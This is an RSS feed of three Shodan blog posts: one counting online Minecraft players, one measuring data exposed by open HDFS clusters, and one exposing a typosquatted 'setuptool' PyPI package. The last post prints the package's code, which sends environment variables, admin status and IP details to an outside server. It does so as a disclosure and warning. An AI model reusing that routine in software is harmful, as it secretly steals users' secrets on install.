<?xml version="1.0" encoding="UTF-8"?><rss xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:content="http://purl.org/rss/1.0/modules/content/" xmlns:atom="http://www.w3.org/2005/Atom" version="2.0" xmlns:media="http://search.yahoo.com/mrss/"><channel><title><![CDATA[Python - Shodan Blog]]></title><description><![CDATA[The latest news and developments for Shodan.]]></description><link>https://blog.shodan.io/</link><generator>Ghost 0.7</generator><lastBuildDate>Thu, 09 Apr 2026 17:53:51 GMT</lastBuildDate><atom:link href="https://blog.shodan.io/tag/python/rss/" rel="self" type="application/rss+xml"/><ttl>60</ttl><item><title><![CDATA[Measuring the Minecraft Playerbase]]></title><description><![CDATA[<p>For fun I decided to see whether I can figure out how many Minecraft players are online at the moment. And it turns out that it's fairly straight-forward so here's how I did it.</p>

<p>As of now June 1st 2017 at 18:55 there are <strong>96,418</strong> players online on</p>]]></description><link>https://blog.shodan.io/measuring-the-minecraft-playerbase/</link><guid isPermaLink="false">4e4c6565-a24f-42bf-80bb-0c3839c3b87b</guid><category><![CDATA[minecraft]]></category><category><![CDATA[Python]]></category><category><![CDATA[CLI]]></category><dc:creator><![CDATA[John Matherly]]></dc:creator><pubDate>Fri, 02 Jun 2017 00:20:35 GMT</pubDate><media:content url="http://blog.shodan.io/content/images/2017/06/4453115-minecraft-wallpapers.jpg" medium="image"/><content:encoded><![CDATA[<img src="http://blog.shodan.io/content/images/2017/06/4453115-minecraft-wallpapers.jpg" alt="Measuring the Minecraft Playerbase"><p>For fun I decided to see whether I can figure out how many Minecraft players are online at the moment. And it turns out that it's fairly straight-forward so here's how I did it.</p>

<p>As of June 1st, 2017 at 18:55 there are <strong>96,418</strong> players online on public servers.</p>

<p>To get started I downloaded the latest list of Minecraft servers from Shodan:</p>

<pre><code>shodan download --limit -1 minecraft-servers product:minecraft port:25565
</code></pre>

<p>Now the next task is to parse that list of servers and request the number of players that are currently online. To speed things up the plan is to asynchronously perform the requests to the Minecraft servers using the <a href="http://www.gevent.org">gevent</a> library in Python. It lets you write code that looks synchronous but actually runs asynchronously which means you can perform many connections in parallel. This is the usual template I use when grabbing a bunch of data using gevent:</p>

<pre><code>#!/usr/bin/env python
#
# Shodan Async Workers

## Configuration
NUM_WORKERS = 100


# Make the stdlib async. This is where the gevent magic happens
import gevent.monkey
gevent.monkey.patch_all(subprocess=True, sys=True)


from gevent.pool import Pool
from shodan.helpers import iterate_files
from socket import setdefaulttimeout, socket, AF_INET, SOCK_STREAM

setdefaulttimeout(2.0)

def worker(banner):
    # Here's where you do the network stuff
    # Example:
    # con = socket(AF_INET, SOCK_STREAM)
    # con.connect((banner['ip_str'], banner['port']))
    # con.send(b'hello world\n')
    # data = con.recv(5120)
    return True

def main(files):
    pool = Pool(NUM_WORKERS)

    # Loop through the banners in the file(s) and launch a worker
    # for each banner. When the pool is full it will cause the loop to
    # block until a worker finishes and opens up a spot in the pool.
    for banner in iterate_files(files):
        pool.spawn(worker, banner)

    # Wait for the workers to finish up
    pool.join()

    return True


if __name__ == '__main__':
    import sys
    # main() returns True on success; map that to exit status 0
    sys.exit(0 if main(sys.argv[1:]) else 1)
</code></pre>
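
<p>If gevent isn't available, the same bounded-pool idea can be approximated with the standard library. This is only a rough sketch that swaps in a thread pool for gevent's greenlets; <em>run_workers()</em> and the placeholder <em>worker()</em> body are hypothetical names for illustration. One difference to keep in mind: the thread pool's map() queues every banner up front, whereas the gevent pool above blocks the loop whenever it is full.</p>

```python
from concurrent.futures import ThreadPoolExecutor

NUM_WORKERS = 100  # same pool size as the gevent template


def worker(banner):
    # Hypothetical placeholder: a real worker would connect to
    # banner['ip_str'] on banner['port'] and return what it learned.
    return banner.get('port') == 25565


def run_workers(banners, num_workers=NUM_WORKERS):
    # At most num_workers calls to worker() run at the same time.
    # Results come back in the same order as the input banners.
    with ThreadPoolExecutor(max_workers=num_workers) as pool:
        return list(pool.map(worker, banners))
```

<p>Calling <em>run_workers()</em> with a list of banner dictionaries returns one result per banner.</p>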

<p>If you're working with Shodan data files I recommend checking out the <strong>shodan.helpers.iterate_files()</strong> function since it makes it easy to access the banners. You can give it either a single file:</p>

<pre><code>for banner in iterate_files('minecraft-data.json.gz'):
    ...
</code></pre>

<p>Or you can provide it a list of files:</p>

<pre><code>for banner in iterate_files(['minecraft-2017-04.json.gz', 'minecraft-2017-05.json.gz']):
    ...
</code></pre>
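
<p>To give a feel for what happens under the hood: Shodan data files are gzip-compressed with one JSON banner per line. The sketch below is a simplified stand-in, not the library's actual implementation, and <em>iterate_banners()</em> is a hypothetical name.</p>

```python
import gzip
import json


def iterate_banners(filenames):
    """Yield one banner (a dict) per line from one or more .json.gz files."""
    # Accept a single filename as well as a list of filenames
    if isinstance(filenames, str):
        filenames = [filenames]
    for filename in filenames:
        with gzip.open(filename, 'rt', encoding='utf8') as handle:
            for line in handle:
                line = line.strip()
                if line:  # ignore blank lines
                    yield json.loads(line)
```

<p>In practice you'd want to stick with the helper from the Shodan library.</p>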

<p>To get the player count I added code to <em>worker()</em> that queries each server for its status using the <a href="http://wiki.vg/Protocol">current Minecraft protocol</a>, and then kicked it off:</p>

<pre><code>$ python global-player-count.py minecraft-data.json.gz
96418
</code></pre>
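
<p>The worker itself isn't shown above, so here is a rough sketch of what such a status lookup could look like. It assumes the Server List Ping exchange from the protocol documentation (a handshake followed by a status request, answered with a JSON document that has a <em>players.online</em> field). All function names and the protocol version of 47 are assumptions for illustration, not the code used for the measurement.</p>

```python
import json
import socket
import struct


def encode_varint(value):
    """Encode a non-negative integer as a protocol VarInt."""
    out = bytearray()
    while True:
        low = value % 128            # lowest 7 bits
        value = value // 128
        if value:
            out.append(low + 128)    # continuation bit: more bytes follow
        else:
            out.append(low)
            return bytes(out)


def decode_varint(data, offset=0):
    """Decode a VarInt at offset; return (value, next_offset)."""
    value, shift = 0, 0
    while True:
        byte = data[offset]
        offset += 1
        value += (byte % 128) * (2 ** shift)
        shift += 7
        if byte // 128 == 0:         # no continuation bit: done
            return value, offset


def build_status_request(host, port, protocol_version=47):
    """Handshake (next state 1 = status) followed by an empty status request."""
    host_bytes = host.encode('utf8')
    payload = (encode_varint(0) + encode_varint(protocol_version)
               + encode_varint(len(host_bytes)) + host_bytes
               + struct.pack('!H', port) + encode_varint(1))
    return encode_varint(len(payload)) + payload + encode_varint(1) + encode_varint(0)


def parse_player_count(packet):
    """Pull players.online out of a complete status response packet."""
    _length, offset = decode_varint(packet, 0)
    packet_id, offset = decode_varint(packet, offset)
    if packet_id != 0:
        return 0
    json_length, offset = decode_varint(packet, offset)
    status = json.loads(packet[offset:offset + json_length].decode('utf8'))
    return int(status.get('players', {}).get('online', 0))


def read_exact(con, count):
    """Read exactly count bytes from the socket."""
    buf = b''
    while len(buf) != count:
        chunk = con.recv(count - len(buf))
        if not chunk:
            raise IOError('connection closed early')
        buf += chunk
    return buf


def fetch_player_count(host, port, timeout=2.0):
    """Connect to one server and return its reported online player count."""
    con = socket.create_connection((host, port), timeout=timeout)
    try:
        con.sendall(build_status_request(host, port))
        prefix = b''
        while True:                  # read the VarInt length prefix
            byte = read_exact(con, 1)
            prefix += byte
            if byte[0] // 128 == 0:
                break
        length, _ = decode_varint(prefix)
        return parse_player_count(prefix + read_exact(con, length))
    finally:
        con.close()
```

<p>A worker built on this would call <em>fetch_player_count(banner['ip_str'], banner['port'])</em>, treat any socket or parsing error as zero players and add the results up at the end.</p>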

<p>And that's how I'm now keeping track of how many players are online on Minecraft at any given moment!</p>

<p>Note that this method only looks at Minecraft servers running on the default port (25565) and that are publicly-accessible on the Internet.</p>]]></content:encoded></item><item><title><![CDATA[The HDFS Juggernaut]]></title><description><![CDATA[<p>There's been much focus on MongoDB, Elastic and Redis in terms of data exposure on the Internet due to their general popularity in the developer community. However, in terms of data volume it turns out that HDFS is the real juggernaut. To give you a better idea here's a quick</p>]]></description><link>https://blog.shodan.io/the-hdfs-juggernaut/</link><guid isPermaLink="false">c469ddda-3cd3-48db-b4dc-a2d771993b61</guid><category><![CDATA[NoSQL]]></category><category><![CDATA[research]]></category><category><![CDATA[Python]]></category><category><![CDATA[HDFS]]></category><category><![CDATA[CLI]]></category><dc:creator><![CDATA[John Matherly]]></dc:creator><pubDate>Wed, 31 May 2017 17:32:11 GMT</pubDate><media:content url="http://blog.shodan.io/content/images/2017/05/hdfs-map-1600.png" medium="image"/><content:encoded><![CDATA[<img src="http://blog.shodan.io/content/images/2017/05/hdfs-map-1600.png" alt="The HDFS Juggernaut"><p>There's been much focus on MongoDB, Elastic and Redis in terms of data exposure on the Internet due to their general popularity in the developer community. However, in terms of data volume it turns out that HDFS is the real juggernaut. To give you a better idea here's a quick comparison between MongoDB and HDFS:</p>

<table>  
<thead>  
<tr>  
<th></th>  
<th>MongoDB</th>  
<th>HDFS</th>  
</tr>  
</thead>  
<tbody>  
<tr>  
<td>Number of Servers</td>  
<td>47,820</td>  
<td>4,487</td>  
</tr>  
<tr>  
<td>Data Exposed</td>  
<td>25 TB</td>  
<td>5,120 TB</td>  
</tr>  
</tbody>  
</table>

<p>Even though far more MongoDB databases are connected to the Internet without authentication, the amount of data they expose is dwarfed by what HDFS clusters expose (25 TB vs 5 PB). Where are all these instances located?</p>

<script type="text/javascript" src="https://asciinema.org/a/6dzqir2jbssqftvcxwgh63dwp.js" id="asciicast-6dzqir2jbssqftvcxwgh63dwp" async></script>

<p>Most of the HDFS NameNodes are located in the US (1,900) and China (1,426). And nearly all of the HDFS instances are hosted on the cloud with Amazon leading the charge (1,059) followed by Alibaba (507).</p>
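
<p>A similar breakdown can be approximated from downloaded banners in Python. This is a minimal sketch, assuming each banner carries the country in <em>location.country_code</em> and the hosting organization in <em>org</em>; the <em>summarize()</em> name is hypothetical, and banners missing either field are counted as "unknown".</p>

```python
from collections import Counter


def summarize(banners, top=5):
    """Return the most common countries and organizations in the banners."""
    countries = Counter()
    orgs = Counter()
    for banner in banners:
        location = banner.get('location') or {}
        countries[location.get('country_code') or 'unknown'] += 1
        orgs[banner.get('org') or 'unknown'] += 1
    return countries.most_common(top), orgs.most_common(top)
```

<p>Feeding it the output of <em>iterate_files()</em> gives two lists of (name, count) pairs, sorted from most to least common.</p>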

<p><img src="https://blog.shodan.io/content/images/2017/05/hdfs-map-600.png" alt="The HDFS Juggernaut"></p>

<p>The ransomware attacks on databases that were <a href="http://www.csoonline.com/article/3154190/security/exposed-mongodb-installs-being-erased-held-for-ransom.html">widely</a> <a href="https://www.fidelissecurity.com/threatgeek/2017/01/revenge-devops-gangster-open-hadoop-installs-wiped-worldwide">publicized</a> earlier in the year are still happening. And they're impacting both MongoDB and HDFS deployments. For HDFS, Shodan has discovered roughly <a href="https://www.shodan.io/search?query=NODATA4U_SECUREYOURSHIT">207 clusters</a> that have a message warning of the public exposure. And a quick glance at search results in Shodan reveals that most of the public MongoDB instances <a href="https://www.shodan.io/search?query=product%3Amongodb">seem to be compromised</a>. I've <a href="https://blog.shodan.io/its-the-data-stupid/">previously written</a> on the reason behind these exposures but note that both products nowadays have extensive documentation on <a href="https://docs.mongodb.com/manual/security/">secure deployment</a>.</p>

<h6 id="technicaldetails">Technical Details</h6>

<p>If you'd like to replicate the above findings or perform your own investigations into data exposure, this is how I measured the above.</p>

<ol>
<li><p>Download data using the <a href="https://cli.shodan.io">Shodan command-line interface</a>:</p>

<pre><code>shodan download --limit -1 hdfs-servers product:namenode
</code></pre></li>
<li><p>Write a Python script to measure the amount of exposed data (<strong>hdfs-exposure.py</strong>):</p>

<pre><code>from shodan.helpers import iterate_files, humanize_bytes
from sys import argv, exit


if len(argv) &lt;= 1:
    print('Usage: {} &lt;file1.json.gz&gt; ...'.format(argv[0]))
    exit(1)


datasize = 0
clusters = {}


# Loop over all the banners in the provided files
for banner in iterate_files(argv[1:]):
    try:
        # Grab the HDFS information that Shodan gathers
        info = banner['opts']['hdfs-namenode']
        cid = info['ClusterId']
        # Skip clusters we've already counted
        if cid in clusters:
            continue
        datasize += info['Used']
        clusters[cid] = True
    except (KeyError, TypeError):
        # Skip banners that don't include the HDFS NameNode details
        pass


print(humanize_bytes(datasize))
</code></pre></li>
<li><p>Run the Python script to get the amount of data exposed:</p>

<pre><code>$ python hdfs-exposure.py hdfs-data.json.gz
5.0 PB
</code></pre></li>
</ol>]]></content:encoded></item><item><title><![CDATA[Hostility in the Cheese Shop]]></title><description><![CDATA[<p>A user on Reddit noticed an <a href="https://www.reddit.com/r/Python/comments/2wr93b/this_one_looks_odd_doesnt_it/">odd package</a> in the Python Package Index, sometimes referred to as the <a href="https://www.youtube.com/watch?v=B3KBuQHHKx0">Cheese Shop</a>. It's a package with the name <strong>setuptool</strong>, which a user might mistype when trying to install the popular <strong>setuptools</strong> package (note the <strong>s</strong> at the end). Instead of installing a</p>]]></description><link>https://blog.shodan.io/hostility-in-the-python-package-index/</link><guid isPermaLink="false">ffc39b5d-d427-4a33-b598-9dc83414d806</guid><category><![CDATA[Python]]></category><category><![CDATA[Reddit]]></category><dc:creator><![CDATA[John Matherly]]></dc:creator><pubDate>Sun, 22 Feb 2015 18:22:14 GMT</pubDate><media:content url="https://2.bp.blogspot.com/-sgDWeh6qpmA/UTg1O9yIb5I/AAAAAAAANBs/gn1nLMdMSI8/s1600/cheese-dubois-4.JPG" medium="image"/><content:encoded><![CDATA[<img src="https://2.bp.blogspot.com/-sgDWeh6qpmA/UTg1O9yIb5I/AAAAAAAANBs/gn1nLMdMSI8/s1600/cheese-dubois-4.JPG" alt="Hostility in the Cheese Shop"><p>A user on Reddit noticed an <a href="https://www.reddit.com/r/Python/comments/2wr93b/this_one_looks_odd_doesnt_it/">odd package</a> in the Python Package Index, sometimes referred to as the <a href="https://www.youtube.com/watch?v=B3KBuQHHKx0">Cheese Shop</a>. It's a package with the name <strong>setuptool</strong>, which a user might mistype when trying to install the popular <strong>setuptools</strong> package (note the <strong>s</strong> at the end). Instead of installing a package to help build, install and upgrade packages, the user is installing a package that executes the following:</p>

<pre><code>def install(name):
    installed_package = name
    installed_at = datetime.datetime.utcnow()
    host_os = platform.platform()
    try:
        admin_rights = bool(os.getuid() == 0)
    except AttributeError:
        try:
            admin_rights = bool(ctypes.windll.shell32.IsUserAnAdmin() !=    0)
        except:
            admin_rights = False

    environ = os.environ

    if sys.version_info[0] == 3:
        import urllib.request
        from urllib.parse import urlencode
        GET = urllib.request.urlopen
    else:
        import urllib2
        from urllib import urlencode
        GET = urllib2.urlopen

    ipinfo = GET('http://ipinfo.io/json').read()

    try:
        data = {
            'ip': installed_package,
            'ia': installed_at,
            'ho': host_os,
            'ar': admin_rights,
            'env': environ,
            'ii': ipinfo
        }
        data = urlencode(data)
        r = GET('https://zzz.scrapeulous.com/r?',   data.encode('utf8')).read()
    except Exception as e:
        pass
</code></pre>

<p>The code determines whether the user is executing the installation as an administrator (<strong>admin_rights</strong>), which package is being installed, since there are several of these hostile packages (<strong>installed_package</strong>), the environment variables (<strong>environ</strong>) and the IP address of the device (<strong>ipinfo</strong>). It also records the installation time (<strong>installed_at</strong>) and the operating system (<strong>host_os</strong>). All the information is URL-encoded and then sent to the server located at:</p>

<p><a href="https://zzz.scrapeulous.com/r?">https://zzz.scrapeulous.com/r?</a></p>

<p>According to the author of the website, these hostile packages are used as honeypots. Honeypots are usually set up to capture and analyze potentially malicious activities, but I'm not sure what sort of malicious intent can be deduced from mistyping a package name (maybe that's why the author is grabbing the environment variables?). And the page explaining the intent as being for honeypots was only put up after the Reddit thread blew up. If this was to catch malicious scripts that had typos in them, he wouldn't have had to fake the package author information as well. Hopefully, the person behind this project will publish his research and explain the methodology. In addition to the <strong>setuptool</strong> package, the user also has other misnamed packages floating around, one of which was <a href="https://www.reddit.com/r/Python/comments/2wr93b/this_one_looks_odd_doesnt_it/cotffhi">identified by chhantyal on Reddit</a>. This time it's catching people that mistype the name of the <strong>requests</strong> package, a popular alternative to the standard library for performing HTTP requests. If a user types <strong>reqests</strong> instead of the real name, they get a script similar to the one above, which you can <a href="https://mega.co.nz/#!QVg1iYZT!JX6s2wG3dVy_CDiZwHUvXBhSrHgLrpUt5vxfe9S-sr0">download here</a> since the affected packages have already been taken down.</p>
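
<p>As a small illustration of how close these names are, here is a hypothetical client-side check that flags a requested name when it is a near miss of a well-known package. The <em>KNOWN_PACKAGES</em> list, the <em>possible_typosquat()</em> name and the 0.85 similarity cutoff are all assumptions made for this sketch; it is not something the package index or pip does.</p>

```python
import difflib

# Hypothetical list of names worth protecting; a real list would be longer
KNOWN_PACKAGES = ['requests', 'setuptools']


def possible_typosquat(name, known=KNOWN_PACKAGES, cutoff=0.85):
    """Return the well-known package that name closely resembles, if any."""
    if name in known:
        return None  # exact match: this is the real package
    matches = difflib.get_close_matches(name, known, n=1, cutoff=cutoff)
    return matches[0] if matches else None
```

<p>Both <strong>setuptool</strong> and <strong>reqests</strong> score well above that cutoff against the real names, so a check like this would have flagged them before installation.</p>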

<p>The Python Cheese Shop doesn't ensure the packages are safe and doesn't have any safeguards against potential <a href="https://en.wikipedia.org/wiki/Typosquatting">typosquatting</a>. It would be interesting to see whether other package repositories for NodeJS or Ruby have also experienced typosquatting. If anybody reading this is aware of something, please let me know! And if you're using Python, you should be <a href="http://docs.python-guide.org/en/latest/dev/virtualenvs/">using a virtual environment</a> to make sure no malicious code will run with administrative rights.</p>]]></content:encoded></item></channel></rss>